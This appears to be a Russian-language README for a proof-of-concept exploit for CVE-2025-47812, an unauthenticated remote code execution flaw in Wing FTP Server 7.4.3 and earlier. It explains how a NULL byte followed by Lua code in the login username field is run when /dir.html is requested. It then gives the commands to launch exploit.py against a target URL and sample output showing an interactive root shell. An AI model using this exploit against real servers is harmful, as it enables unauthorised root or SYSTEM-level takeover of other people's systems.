
Эксплойт proof-of-concept для CVE-2025-47812: неаутентифицированное удалённое выполнение кода в Wing FTP Server <= 7.4.3 через внедрение NULL-байта в параметр имени пользователя, обеспечивающее доступ к оболочке root/SYSTEM.
Неаутентифицированная уязвимость удаленного выполнения кода в Wing FTP Server <= 7.4.3. Нулевой байт, вставленный в параметр
usernameпри входе, приводит к записи Lua-кода в файл сессии. При обращении к/dir.htmlс полученным cookie сессии вставленный код выполняется — как root на Linux или SYSTEM на Windows.
/loginok.html вставляет нулевой байт, за которым следует Lua-код, в поле username./dir.html с возвращенным cookie UID запускает выполнение вставленного Lua-кода.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
Пример:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root